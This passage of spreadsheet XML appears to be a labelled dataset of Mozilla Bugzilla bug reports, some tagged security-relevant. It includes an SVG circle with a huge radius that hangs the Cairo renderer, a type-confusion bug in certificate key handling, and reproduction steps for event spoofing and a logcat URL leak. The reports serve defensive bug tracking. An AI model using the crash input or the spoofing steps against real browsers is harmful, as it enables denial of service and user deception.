        <is>
          <t>[sg:dos]</t>
        </is>
      </c>
      <c r="Q200" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R200" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S200" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T200" t="n">
        <v>1</v>
      </c>
      <c r="U200" t="n">
        <v>0</v>
      </c>
      <c r="V200" t="n">
        <v>19</v>
      </c>
      <c r="W200" t="inlineStr">
        <is>
          <t>Created attachment 278380
svg circle
svg circle with infinite radius causes hang
&lt;circle cx="100" cy="100" r="200E200" /&gt; 
causes
_cairo_arc_in_direction (cr=0x8e3a560, xc=100, yc=100, 
    radius=inf, angle_min=0, angle_max=3.1415926535897931, 
this is kind of dos
(gdb) bt
#0  0xb74c3bd6 in sin () from /lib/i686/libm.so.6
#1  0xb6223915 in _arc_error_normalized (angle=1.6922030997455189e-07)
    at /opt/joro/firefox-cvs/mozilla/gfx/cairo/cairo/src/cairo-arc.c:64
#2  0xb6223a21 in _arc_max_angle_for_tolerance_normalized (tolerance=0)
    at /opt/joro/firefox-cvs/mozilla/gfx/cairo/cairo/src/cairo-arc.c:99
#3  0xb6223aa7 in _arc_segments_needed (angle=3.1415926535897931, radius=inf, 
    ctm=0xbf9c5620, tolerance=0.10000000000000001)
    at /opt/joro/firefox-cvs/mozilla/gfx/cairo/cairo/src/cairo-arc.c:117
#4  0xb6223dca in _cairo_arc_in_direction (cr=0x8e3a560, xc=100, yc=100, 
    radius=inf, angle_min=0, angle_max=3.1415926535897931, 
    dir=CAIRO_DIRECTION_FORWARD)
    at /opt/joro/firefox-cvs/mozilla/gfx/cairo/cairo/src/cairo-arc.c:214
#5  0xb6223ce2 in _cairo_arc_in_direction (cr=0x8e3a560, xc=100, yc=100, 
    radius=inf, angle_min=0, angle_max=6.2831853071795862, 
    dir=CAIRO_DIRECTION_FORWARD)
    at /opt/joro/firefox-cvs/mozilla/gfx/cairo/cairo/src/cairo-arc.c:192
#6  0xb6223ec3 in _cairo_arc_path (cr=0x8e3a560, xc=100, yc=100, radius=inf, 
    angle1=0, angle2=6.2831853071795862)
    at /opt/joro/firefox-cvs/mozilla/gfx/cairo/cairo/src/cairo-arc.c:256
#7  0xb6221e81 in _moz_cairo_arc (cr=0x8e3a560, xc=100, yc=100, radius=inf, 
    angle1=0, angle2=6.2831853071795862)
    at /opt/joro/firefox-cvs/mozilla/gfx/cairo/cairo/src/cairo.c:1578
#8  0xb61ff54c in gfxContext::Arc (this=0xbf9c5974, center=@0xbf9c58b0,
(gdb) next
_arc_max_angle_for_tolerance_normalized (tolerance=0)
    at /opt/joro/firefox-cvs/mozilla/gfx/cairo/cairo/src/cairo-arc.c:100
100         } while (error &gt; tolerance);
(gdb) p error
$1 = 4.246402931726046e-46
(gdb) p tolerance
$2 = 0
(gdb)</t>
        </is>
      </c>
      <c r="X200" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="201">
      <c r="A201" t="n">
        <v>1794508</v>
      </c>
      <c r="B201" t="inlineStr">
        <is>
          <t>2022-10-10 16:34:47 -0700</t>
        </is>
      </c>
      <c r="C201" t="inlineStr">
        <is>
          <t>`GetStorageAccess() == ePrivateBrowsing` in ServiceWorkersEnabled() does not always detect private browsing mode</t>
        </is>
      </c>
      <c r="D201" t="inlineStr">
        <is>
          <t>2023-06-16 08:57:42 -0700</t>
        </is>
      </c>
      <c r="E201" t="n">
        <v>1</v>
      </c>
      <c r="F201" t="n">
        <v>1</v>
      </c>
      <c r="G201" t="n">
        <v>3</v>
      </c>
      <c r="H201" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I201" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J201" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K201" t="inlineStr">
        <is>
          <t>Firefox 104</t>
        </is>
      </c>
      <c r="L201" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M201" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N201" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O201" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P201" t="inlineStr">
        <is>
          <t>[adv-main107+]</t>
        </is>
      </c>
      <c r="Q201" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R201" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S201" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T201" t="n">
        <v>1</v>
      </c>
      <c r="U201" t="n">
        <v>0</v>
      </c>
      <c r="V201" t="n">
        <v>24</v>
      </c>
      <c r="W201" t="inlineStr">
        <is>
          <t>`ePartitionForeignOrDeny` can appear in some third party iframes and thus cause detection failure.
We'll have to update `dom/serviceworkers/test/test_privateBrowsing.html` to cover that.</t>
        </is>
      </c>
      <c r="X201" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="202">
      <c r="A202" t="n">
        <v>534768</v>
      </c>
      <c r="B202" t="inlineStr">
        <is>
          <t>2009-12-14 16:51:15 -0800</t>
        </is>
      </c>
      <c r="C202" t="inlineStr">
        <is>
          <t>Crash [@ nsBidiPresUtils::Resolve]</t>
        </is>
      </c>
      <c r="D202" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:50 -0700</t>
        </is>
      </c>
      <c r="E202" t="n">
        <v>1</v>
      </c>
      <c r="F202" t="n">
        <v>1</v>
      </c>
      <c r="G202" t="n">
        <v>3</v>
      </c>
      <c r="H202" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I202" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J202" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K202" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L202" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M202" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N202" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O202" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P202" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q202" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R202" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S202" t="inlineStr">
        <is>
          <t>mozilla1.9.3a4</t>
        </is>
      </c>
      <c r="T202" t="n">
        <v>1</v>
      </c>
      <c r="U202" t="n">
        <v>0</v>
      </c>
      <c r="V202" t="n">
        <v>24</v>
      </c>
      <c r="W202" t="inlineStr">
        <is>
          <t>Variations on bug 429865's crashtest still cause problems.</t>
        </is>
      </c>
      <c r="X202" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="203">
      <c r="A203" t="n">
        <v>555205</v>
      </c>
      <c r="B203" t="inlineStr">
        <is>
          <t>2010-03-26 07:48:32 -0700</t>
        </is>
      </c>
      <c r="C203" t="inlineStr">
        <is>
          <t>Graph server posts for builds should be done on the slaves</t>
        </is>
      </c>
      <c r="D203" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E203" t="n">
        <v>1</v>
      </c>
      <c r="F203" t="n">
        <v>1</v>
      </c>
      <c r="G203" t="n">
        <v>5</v>
      </c>
      <c r="H203" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I203" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J203" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K203" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L203" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M203" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N203" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O203" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P203" t="inlineStr">
        <is>
          <t>[automation]</t>
        </is>
      </c>
      <c r="Q203" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R203" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S203" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T203" t="n">
        <v>1</v>
      </c>
      <c r="U203" t="n">
        <v>0</v>
      </c>
      <c r="V203" t="n">
        <v>32</v>
      </c>
      <c r="W203" t="inlineStr">
        <is>
          <t>To reduce load average of the masters graph server posts should be done on the slaves.
Additionally, instead of posting each result separately we should use one post for all results. See the following Talos function:
http://mxr.mozilla.org/mozilla/source/testing/performance/talos/post_file.py#37</t>
        </is>
      </c>
      <c r="X203" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="204">
      <c r="A204" t="n">
        <v>935618</v>
      </c>
      <c r="B204" t="inlineStr">
        <is>
          <t>2013-11-06 10:17:02 -0800</t>
        </is>
      </c>
      <c r="C204" t="inlineStr">
        <is>
          <t>nsConvertToActualKeyGenParams uses the union in a  SECKEYPublicKey without checking its type</t>
        </is>
      </c>
      <c r="D204" t="inlineStr">
        <is>
          <t>2014-04-25 12:51:18 -0700</t>
        </is>
      </c>
      <c r="E204" t="n">
        <v>1</v>
      </c>
      <c r="F204" t="n">
        <v>1</v>
      </c>
      <c r="G204" t="n">
        <v>3</v>
      </c>
      <c r="H204" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I204" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J204" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K204" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L204" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M204" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N204" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O204" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P204" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
      <c r="Q204" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R204" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S204" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T204" t="n">
        <v>1</v>
      </c>
      <c r="U204" t="n">
        <v>0</v>
      </c>
      <c r="V204" t="n">
        <v>12</v>
      </c>
      <c r="W204" t="inlineStr">
        <is>
          <t>562           char *certstr = PL_strndup(value, value_len);
563           if (certstr) {
564             keyPairInfo-&gt;ecPopCert = CERT_ConvertAndDecodeCertificate(certstr);
565             PL_strfree(certstr);
566 
567             if (keyPairInfo-&gt;ecPopCert)
568             {
569               keyPairInfo-&gt;ecPopPubKey = CERT_ExtractPublicKey(keyPairInfo-&gt;ecPopCert);
570             }
571           }
572         }
573       }
574     }
575 
576     // first try to use the params of the provided CA cert
577     if (keyPairInfo-&gt;ecPopPubKey)
578     {
579       returnParams = SECITEM_DupItem(&amp;keyPairInfo-&gt;ecPopPubKey-&gt;u.ec.DEREncodedParams);
580     }
nsConvertToActualKeyGenParams decodes a base-64 encoded certificate, extracts its public key, and then assumes it's an elliptic curve key without actually checking. I'm almost certain this is exploitable (dereferencing attacker-controlled memory, etc.). It crashes Nightly but doesn't seem to crash my local debug build.</t>
        </is>
      </c>
      <c r="X204" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="205">
      <c r="A205" t="n">
        <v>1651636</v>
      </c>
      <c r="B205" t="inlineStr">
        <is>
          <t>2020-07-09 03:37:40 -0700</t>
        </is>
      </c>
      <c r="C205" t="inlineStr">
        <is>
          <t>Clicking "stay on page" (ie cancelling) in beforeunload dialogs should cause us to reset the URL bar</t>
        </is>
      </c>
      <c r="D205" t="inlineStr">
        <is>
          <t>2020-08-27 14:53:04 -0700</t>
        </is>
      </c>
      <c r="E205" t="n">
        <v>1</v>
      </c>
      <c r="F205" t="n">
        <v>1</v>
      </c>
      <c r="G205" t="n">
        <v>2</v>
      </c>
      <c r="H205" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I205" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J205" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K205" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L205" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M205" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N205" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O205" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P205" t="inlineStr">
        <is>
          <t>[adv-main80+]</t>
        </is>
      </c>
      <c r="Q205" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R205" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S205" t="inlineStr">
        <is>
          <t>Firefox 80</t>
        </is>
      </c>
      <c r="T205" t="n">
        <v>1</v>
      </c>
      <c r="U205" t="n">
        <v>2</v>
      </c>
      <c r="V205" t="n">
        <v>9</v>
      </c>
      <c r="W205" t="inlineStr">
        <is>
          <t>The fact that we don't do this is part of a chain of not-quite-right-things used by https://twitter.com/lbherrera_/status/1280617786088329220 and bug 1333599. AIUI fixing this will break the spoof. There's an old patch to address this in bug 1333599, I think.</t>
        </is>
      </c>
      <c r="X205" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="206">
      <c r="A206" t="n">
        <v>1211524</v>
      </c>
      <c r="B206" t="inlineStr">
        <is>
          <t>2015-10-05 09:22:59 -0700</t>
        </is>
      </c>
      <c r="C206" t="inlineStr">
        <is>
          <t>Add badges to the readme for tracking Python and node dependency out-of-date-ness</t>
        </is>
      </c>
      <c r="D206" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E206" t="n">
        <v>1</v>
      </c>
      <c r="F206" t="n">
        <v>1</v>
      </c>
      <c r="G206" t="n">
        <v>7</v>
      </c>
      <c r="H206" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I206" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J206" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K206" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N206" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O206" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P206" t="inlineStr"/>
      <c r="Q206" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R206" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S206" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T206" t="n">
        <v>1</v>
      </c>
      <c r="U206" t="n">
        <v>0</v>
      </c>
      <c r="V206" t="n">
        <v>4</v>
      </c>
      <c r="W206" t="inlineStr">
        <is>
          <t>To simplify tracking updates to our Python and nodejs dependencies, we should add badges to the readme to services that can do this for us, eg:
https://requires.io/
https://david-dm.org/
They will allow us to see if we're using insecure versions, as well as provide quick links to changelogs etc.</t>
        </is>
      </c>
      <c r="X206" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" t="n">
        <v>1000514</v>
      </c>
      <c r="B207" t="inlineStr">
        <is>
          <t>2014-04-23 14:20:38 -0700</t>
        </is>
      </c>
      <c r="C207" t="inlineStr">
        <is>
          <t>Toolkit toolbar dialog customization event spoofing</t>
        </is>
      </c>
      <c r="D207" t="inlineStr">
        <is>
          <t>2015-02-18 13:40:53 -0800</t>
        </is>
      </c>
      <c r="E207" t="n">
        <v>1</v>
      </c>
      <c r="F207" t="n">
        <v>1</v>
      </c>
      <c r="G207" t="n">
        <v>3</v>
      </c>
      <c r="H207" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I207" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J207" t="inlineStr">
        <is>
          <t>Toolbars and Toolbar Customization</t>
        </is>
      </c>
      <c r="K207" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L207" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M207" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N207" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O207" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P207" t="inlineStr">
        <is>
          <t>[Australis:P4][qa!][adv-main31+]</t>
        </is>
      </c>
      <c r="Q207" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R207" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S207" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T207" t="n">
        <v>1</v>
      </c>
      <c r="U207" t="n">
        <v>0</v>
      </c>
      <c r="V207" t="n">
        <v>24</v>
      </c>
      <c r="W207" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #910375 +++
It is possible to craft a drag and drop event in content which mimics the behavior of a chrome customization event. This attack is very unlikely as it requires the user to have the customizable page / panel open and then drag and drop from another window to the page. The impact is also very low since all an attacker can do is move icons around. The current chrome code only uses the event to pick an icon to move.
Marking this as security sensitive because bug 910375 was also security sensitive.
STR
1. Open the customize toolbar dialog
2. Open above file in another window or visit
https://people.mozilla.com/~dchan/drag.html
3. Drag the Firefox icon to a toolbar
Result
The Subscribe icon moves
Expected
Icon doesn't move</t>
        </is>
      </c>
      <c r="X207" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="208">
      <c r="A208" t="n">
        <v>1407891</v>
      </c>
      <c r="B208" t="inlineStr">
        <is>
          <t>2017-10-11 20:15:26 -0700</t>
        </is>
      </c>
      <c r="C208" t="inlineStr">
        <is>
          <t>View SVG Image for images with data URL fails</t>
        </is>
      </c>
      <c r="D208" t="inlineStr">
        <is>
          <t>2017-11-12 19:20:17 -0800</t>
        </is>
      </c>
      <c r="E208" t="n">
        <v>1</v>
      </c>
      <c r="F208" t="n">
        <v>1</v>
      </c>
      <c r="G208" t="n">
        <v>3</v>
      </c>
      <c r="H208" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I208" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J208" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K208" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L208" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M208" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N208" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O208" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P208" t="inlineStr">
        <is>
          <t>[domsecurity-active]</t>
        </is>
      </c>
      <c r="Q208" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R208" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S208" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T208" t="n">
        <v>1</v>
      </c>
      <c r="U208" t="n">
        <v>0</v>
      </c>
      <c r="V208" t="n">
        <v>22</v>
      </c>
      <c r="W208" t="inlineStr">
        <is>
          <t>STR:
1. Visit a page that includes an image with src="data:..." (example in the URL field).
2. Right click the image and choose "View Image".
Actual: Nothing happens.
Expected: Navigate to the data: URL.
I have verified that tweaking security.data_uri.block_toplevel_data_uri_navigations makes this work as expected.
This is a chrome action and the deliberate choice of users, so it should work.</t>
        </is>
      </c>
      <c r="X208" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="209">
      <c r="A209" t="n">
        <v>1149094</v>
      </c>
      <c r="B209" t="inlineStr">
        <is>
          <t>2015-03-30 03:19:33 -0700</t>
        </is>
      </c>
      <c r="C209" t="inlineStr">
        <is>
          <t>Mixed content violation log on Fennec leaks sensitive info in URL</t>
        </is>
      </c>
      <c r="D209" t="inlineStr">
        <is>
          <t>2024-05-30 08:59:50 -0700</t>
        </is>
      </c>
      <c r="E209" t="n">
        <v>1</v>
      </c>
      <c r="F209" t="n">
        <v>1</v>
      </c>
      <c r="G209" t="n">
        <v>6</v>
      </c>
      <c r="H209" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I209" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J209" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K209" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L209" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M209" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N209" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O209" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P209" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q209" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R209" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S209" t="inlineStr">
        <is>
          <t>Firefox 40</t>
        </is>
      </c>
      <c r="T209" t="n">
        <v>0</v>
      </c>
      <c r="U209" t="n">
        <v>0</v>
      </c>
      <c r="V209" t="n">
        <v>17</v>
      </c>
      <c r="W209" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2342.2 Safari/537.36
Steps to reproduce:
1. Install Fennec to an Android device which version is 4.0 or less.
2. Launch https://ie.microsoft.com/testdrive/browser/mixedcontent/assets/woodgrove.htm?SECRET#SECRET
3. Ignore SSL error and load the page
4. See logcat (via adb or some way)
Actual results:
Accessed URL contains query string and fragment is leaked to Logcat like below.
W/GeckoConsole( 1364): [JavaScript Warning: "Loading mixed (insecure) display content "http://ie.microsoft.com/testdrive/browser/mixedcontent/assets/images/small_biz.png" on a secure page" {file: "https://ie.microsoft.com/testdrive/browser/mixedcontent/assets/woodgrove.htm?SECRET#SECRET" line: 0}]
On Android 4.0 or less, any application having android.permission.READ_LOGS permission can retrieve other application's log data. And also, it may be sent to the third party as crash logs. So, sensitive information may be leaked.
Expected results:
Mixed content violation log should remove detailed information of URL,e.g, path, query string and fragment.</t>
        </is>
      </c>
      <c r="X209" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="210">
      <c r="A210" t="n">
        <v>1323584</v>
      </c>
      <c r="B210" t="inlineStr">
        <is>
          <t>2016-12-14 15:01:55 -0800</t>
        </is>
      </c>
      <c r="C210" t="inlineStr">
        <is>
          <t>Update to Python 2.7.12 on Heroku/Travis</t>
        </is>
      </c>
      <c r="D210" t="inlineStr">
        <is>
          <t>2016-12-16 09:11:00 -0800</t>
        </is>
      </c>
      <c r="E210" t="n">
        <v>1</v>
      </c>
      <c r="F210" t="n">
        <v>1</v>
      </c>
      <c r="G210" t="n">
        <v>7</v>
      </c>
      <c r="H210" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I210" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J210" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K210" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L210" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M210" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N210" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O210" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P210" t="inlineStr"/>
      <c r="Q210" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R210" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S210" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T210" t="n">
        <v>1</v>
      </c>
      <c r="U210" t="n">
        <v>0</v>
      </c>
      <c r="V210" t="n">
        <v>3</v>
      </c>
      <c r="W210" t="inlineStr">
        <is>
          <t>We're already running 2.7.12 in Vagrant (since it updates from the third party APT repo), so we should update everywhere else to match.</t>
        </is>
      </c>
      <c r="X210" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="211">
      <c r="A211" t="n">
        <v>1431370</v>
      </c>
      <c r="B211" t="inlineStr">
        <is>
          <t>2018-01-18 03:34:21 -0800</t>
        </is>
      </c>
      <c r="C211" t="inlineStr">
        <is>
          <t>Crash in OOM | large | mozalloc_abort | mozalloc_handle_oom | moz_xmalloc | nsTArray_base&lt;T&gt;::EnsureCapacity&lt;T&gt; | nsTArray_base&lt;T&gt;::InsertSlotsAt&lt;T&gt; | nsTArray_Impl&lt;T&gt;::SetLength&lt;T&gt; | mozilla::safebrowsing::DoRiceDeltaDecode</t>
        </is>
      </c>
      <c r="D211" t="inlineStr">
        <is>
          <t>2018-07-31 06:22:37 -0700</t>
        </is>
      </c>
      <c r="E211" t="n">
        <v>1</v>
      </c>
      <c r="F211" t="n">
        <v>1</v>
      </c>
      <c r="G211" t="n">
        <v>3</v>
      </c>
      <c r="H211" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I211" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J211" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K211" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M211" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N211" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O211" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P211" t="inlineStr"/>
      <c r="Q211" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R211" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S211" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T211" t="n">
        <v>1</v>
      </c>
      <c r="U211" t="n">
        <v>0</v>
      </c>
      <c r="V211" t="n">
        <v>12</v>
      </c>
      <c r="W211" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-898cc5c2-de34-4fe2-908e-63c630180117.
=============================================================
Top 10 frames of crashing thread:
0 mozglue.dll mozalloc_abort memory/mozalloc/mozalloc_abort.cpp:33
1 mozglue.dll mozalloc_handle_oom memory/mozalloc/mozalloc_oom.cpp:54
2 mozglue.dll moz_xmalloc memory/mozalloc/mozalloc.cpp:86
3 xul.dll nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt; xpcom/ds/nsTArray-inl.h:136
4 xul.dll nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::InsertSlotsAt&lt;nsTArrayInfallibleAllocator&gt; xpcom/ds/nsTArray-inl.h:289
5 xul.dll nsTArray_Impl&lt;unsigned int, nsTArrayInfallibleAllocator&gt;::SetLength&lt;nsTArrayInfallibleAllocator&gt; xpcom/ds/nsTArray.h:1859
6 xul.dll mozilla::safebrowsing::DoRiceDeltaDecode toolkit/components/url-classifier/ProtocolParser.cpp:1002
7 xul.dll mozilla::safebrowsing::ProtocolParserProtobuf::ProcessEncodedAddition toolkit/components/url-classifier/ProtocolParser.cpp:1025
8 xul.dll mozilla::safebrowsing::ProtocolParserProtobuf::ProcessAdditionOrRemoval toolkit/components/url-classifier/ProtocolParser.cpp:902
9 xul.dll mozilla::safebrowsing::ProtocolParserProtobuf::ProcessOneResponse toolkit/components/url-classifier/ProtocolParser.cpp:866
=============================================================
this out of memory crash signature on windows seems to be introduced with v4 of safebrowsing shipping with firefox. it's a low volume crash after all though.</t>
        </is>
      </c>
      <c r="X211" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="212">
      <c r="A212" t="n">
        <v>1501894</v>
      </c>
      <c r="B212" t="inlineStr">
        <is>
          <t>2018-10-24 18:04:27 -0700</t>
        </is>
      </c>
